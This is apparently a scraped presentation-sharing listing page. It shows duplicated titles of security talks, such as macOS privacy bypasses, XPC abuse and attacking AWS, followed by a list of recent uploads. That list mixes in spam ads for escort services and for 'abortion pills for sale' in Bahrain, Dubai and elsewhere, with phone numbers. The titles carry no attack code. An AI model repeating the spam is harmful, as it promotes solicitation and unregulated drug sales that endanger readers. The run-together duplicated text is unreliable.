20+ Ways to Bypass Your macOS Privacy Mechanisms20+ Ways to Bypass Your macOS Privacy Mechanisms
20+ Ways to Bypass Your macOS Privacy Mechanisms
 
Serverless security: attack & defense
 Serverless security: attack & defense Serverless security: attack & defense
Serverless security: attack & defense
 
Abusing & Securing XPC in macOS apps
Abusing & Securing XPC in macOS appsAbusing & Securing XPC in macOS apps
Abusing & Securing XPC in macOS apps
 
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standardsWebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
 
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standardsWebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
WebApps vs Blockchain dApps (SmartContracts): tools, vulns and standards
 
Let's get evil - threat modeling at scale
Let's get evil - threat modeling at scaleLet's get evil - threat modeling at scale
Let's get evil - threat modeling at scale
 
Attacking AWS: the full cyber kill chain
Attacking AWS: the full cyber kill chainAttacking AWS: the full cyber kill chain
Attacking AWS: the full cyber kill chain
 
Web Apps vs Blockchain dApps (Smart Contracts): tools, vulns and standards
Web Apps vs Blockchain dApps (Smart Contracts): tools, vulns and standardsWeb Apps vs Blockchain dApps (Smart Contracts): tools, vulns and standards
Web Apps vs Blockchain dApps (Smart Contracts): tools, vulns and standards
 
Budowanie i hakowanie nowoczesnych aplikacji iOS
Budowanie i hakowanie nowoczesnych aplikacji iOSBudowanie i hakowanie nowoczesnych aplikacji iOS
Budowanie i hakowanie nowoczesnych aplikacji iOS
 
Building & Hacking Modern iOS Apps
Building & Hacking Modern iOS AppsBuilding & Hacking Modern iOS Apps
Building & Hacking Modern iOS Apps
 
Artificial Intelligence – a buzzword, new era of IT or new threats?
Artificial Intelligence – a buzzword, new era of IT or new threats?Artificial Intelligence – a buzzword, new era of IT or new threats?
Artificial Intelligence – a buzzword, new era of IT or new threats?
 

Dernier

MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...
MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...
MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...Jittipong Loespradit
 
Define the academic and professional writing..pdf
Define the academic and professional writing..pdfDefine the academic and professional writing..pdf
Define the academic and professional writing..pdfPearlKirahMaeRagusta1
 
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...Shane Coughlan
 
VTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learnVTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learnAmarnathKambale
 
Optimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVOptimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVshikhaohhpro
 
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfkalichargn70th171
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️Delhi Call girls
 
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrainmasabamasaba
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsAlberto González Trastoy
 
LEVEL 5 - SESSION 1 2023 (1).pptx - PDF 123456
LEVEL 5   - SESSION 1 2023 (1).pptx - PDF 123456LEVEL 5   - SESSION 1 2023 (1).pptx - PDF 123456
LEVEL 5 - SESSION 1 2023 (1).pptx - PDF 123456KiaraTiradoMicha
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️Delhi Call girls
 
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providermohitmore19
 
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfonteinmasabamasaba
 
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
Chinsurah Escorts ☎️8617697112  Starting From 5K to 15K High Profile Escorts ...Chinsurah Escorts ☎️8617697112  Starting From 5K to 15K High Profile Escorts ...
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...Nitya salvi
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comFatema Valibhai
 
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...Health
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfkalichargn70th171
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsArshad QA
 
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdfPayment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdfkalichargn70th171
 

Dernier (20)

MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...
MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...
MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...
 
Define the academic and professional writing..pdf
Define the academic and professional writing..pdfDefine the academic and professional writing..pdf
Define the academic and professional writing..pdf
 
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
 
VTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learnVTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learn
 
Optimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVOptimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTV
 
Microsoft AI Transformation Partner Playbook.pdf
Microsoft AI Transformation Partner Playbook.pdfMicrosoft AI Transformation Partner Playbook.pdf
Microsoft AI Transformation Partner Playbook.pdf
 
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
 
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
 
LEVEL 5 - SESSION 1 2023 (1).pptx - PDF 123456
LEVEL 5   - SESSION 1 2023 (1).pptx - PDF 123456LEVEL 5   - SESSION 1 2023 (1).pptx - PDF 123456
LEVEL 5 - SESSION 1 2023 (1).pptx - PDF 123456
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
 
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service provider
 
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
 
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
Chinsurah Escorts ☎️8617697112  Starting From 5K to 15K High Profile Escorts ...Chinsurah Escorts ☎️8617697112  Starting From 5K to 15K High Profile Escorts ...
Chinsurah Escorts ☎️8617697112 Starting From 5K to 15K High Profile Escorts ...
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.com
 
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
+971565801893>>SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHAB...
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview Questions
 
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdfPayment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
 

We need t go deeper - Testing inception apps.